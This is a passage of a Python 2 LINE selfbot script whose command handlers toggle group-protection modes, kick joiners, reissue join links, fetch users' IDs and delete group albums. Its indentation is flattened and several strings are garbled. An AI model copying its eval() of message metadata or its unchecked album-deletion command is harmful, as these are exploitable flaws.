txt = msg.text.replace("T-thai ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate thai'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-id " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
#==========================================================================
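            # "Mode on": closes the group's QR ticket, rejects every pending group invitation, and switches the protection flags (QR, cancel, join, name lock, invite block, high protection) on in one pass.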
elif msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Boss")
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
                        wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
if msg.to in protection:
cl.sendText(msg.to,"ᴀʟʀᴇᴀᴅʏ Protect ᴏɴ")
else:
wait["pnharfbot"][msg.to] = cl.getGroup(msg.to).name
f=codecs.open('pnharfbot.json','w','utf-8')
json.dump(wait["pnharfbot"], f, sort_keys=True, indent=4,ensure_ascii=False)
protection.append(msg.to)
cl.sendText(msg.to,"Protect ᴛᴜʀɴᴇᴅ ᴏɴ")
if msg.from_ in admin:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
#==========================================================================
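            # "Mode off": mirror of "Mode on"; clears the protection flags and removes the name lock and invite block for this group.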
elif msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
if "Mode off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
if "Mode off" == msg.text:
try:
if msg.from_ in admin:
protection.remove(msg.to)
cl.sendText(msg.to,"Protect ᴛᴜʀɴᴇᴅ ᴏғғ")
else:
cl.sendText(msg.to,"No have access Protect")
except:
pass
#==========================================================================
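            # The handlers below toggle each protection flag on its own (invite, cancel, QR, contact, join, leave, share, add).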
elif msg.text in ["Invite on","invite on"]:
#if msg.from_ in admin:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
#if msg.from_ in admin:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
#======================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
elif "Protect on" == msg.text:
if msg.to in protection:
cl.sendText(msg.to,"Protect ᴀʟʀᴇᴀᴅʏ ᴏɴ")
else:
wait["pnharfbot"][msg.to] = cl.getGroup(msg.to).name
f=codecs.open('pnharfbot.json','w','utf-8')
json.dump(wait["pnharfbot"], f, sort_keys=True, indent=4,ensure_ascii=False)
protection.append(msg.to)
cl.sendText(msg.to,"Protect ᴛᴜʀɴᴇᴅ ᴏɴ")
elif "Protect off" == msg.text:
try:
if msg.from_ in admin:
protection.remove(msg.to)
cl.sendText(msg.to,"Protect ᴛᴜʀɴᴇᴅ ᴏғғ")
else:
cl.sendText(msg.to,"Protect ᴀʟʀᴇᴀᴅʏ ᴏғғ")
except:
pass
#================================================================
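            # "Undang" / "Tarik" / "Jepit" arm the invite-by-contact flows handled earlier in this event (wait["winvite"] and wait["winvite2"]).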
elif msg.text in ["Undang"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Tarik"]:
if msg.from_ in admin:
wait["winvite2"] = True
random.choice(KAC).sendText(msg.to,"Kirim contact Boss")
elif msg.text in ["Jepit"]:
if msg.from_ in admin:
wait["winvite2"] = True
random.choice(KAC).sendText(msg.to,"Kirim contact Boss")
#============================================================
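            # "Steal mid" / "Steal contact": read the mentioned user's mid from the MENTION metadata and echo it back as text or as a contact card.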
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)#=================
elif msg.text in ["Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["Joinn on","joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Joinn off","joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Invite on","invite on"]:
if msg.from_ in admin:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Invite off","Invite off"]:
if msg.from_ in admin:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Join on","Auto join on"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Join off","Auto join off"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒�。�时开请指定人数��")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
                            cl.sendText(msg.to,strnum + " members or fewer: invitations will be refused automatically")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave on","Auto leave:on"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["Leave off","Auto leave:off"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Status","status"]:
if msg.from_ in admin:
md = "⭐Status Proteksi⭐\n*============*\n"
if wait["Protectgr"] == True: md+="[•]Protect QR [On]\n"
else: md+="[•]Protect QR [Off]\n"
if wait["Protectcancl"] == True: md+="[•]Protect Invite [On]\n"
else: md+="[•]Protect Invite [Off]\n"
if wait["contact"] == True: md+="[•]Contact [On]\n"
else: md+="[•]Contact [Off]\n"
if wait["autoJoin"] == True: md+="[•]Auto Join [On]\n"
else: md +="[•]Auto Join [Off]\n"
if wait["autoCancel"]["on"] == True:md+="[•]Group Cancel " + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "[•]Group Cancel [Off]\n"
if wait["leaveRoom"] == True: md+="[•]Auto Leave [On]\n"
else: md+="[•]Auto Leave [Off]\n"
if wait["timeline"] == True: md+="[•]Share [On]\n"
else:md+="[•]Share [Off]\n"
if wait["autoAdd"] == True: md+="[•]Auto Add [On]\n"
else:md+="[•]Auto Add [Off]\n"
if wait["Backup"] == True: md+="[•]Backup : on\n"
else:md+="[•]Backup : off\n"
if wait["qr"] == True: md+="[•]AutoBlock QR : on\n"
else:md+="[•]AutoBlock QR : off\n"
if wait["commentOn"] == True: md+="[•]Comment [On]\n"
else:md+="[•]Comment [Off]\n"
if wait["Protectcancel"] == True: md+="[•]Protect Cancel [On]\n"
else: md+="[•]Protect Cancel [Off]\n"
if wait["protectionOn"] == True: md+="[•]Protection : hight\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="[•]Protection : low\n"+ datetime.today().strftime('%H:%M:%S')
"\n*============*\n⭐✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰⭐\n*============*"
cl.sendText(msg.to,md)
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif "Album merit " in msg.text:
gid = msg.text.replace("Album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的ç���¸å†Œ"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "Album " in msg.text:
gid = msg.text.replace("Album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "Album remove " in msg.text:
gid = msg.text.replace("Album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "Album removeat’" in msg.text:
gid = msg.text.replace("Album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Add on","Auto add:on"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"Done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["Add off","Auto add:off"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•�候語確èª�"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#-----------------------------------------------
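            # "Backup:on" / "Backup:off" only flip the wait["Backup"] flag; the code that consumes it presumably lives elsewhere in the script.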
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
            #--------------------- SC: invite the owner into a group ------
elif "Asupka: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Asupka: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
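            # "Comment on/off": toggles wait["commentOn"], the auto-comment-on-timeline-posts switch.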
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é �留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","Comment off","comment off","自動首é �留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Comment","留言確�"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv2 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
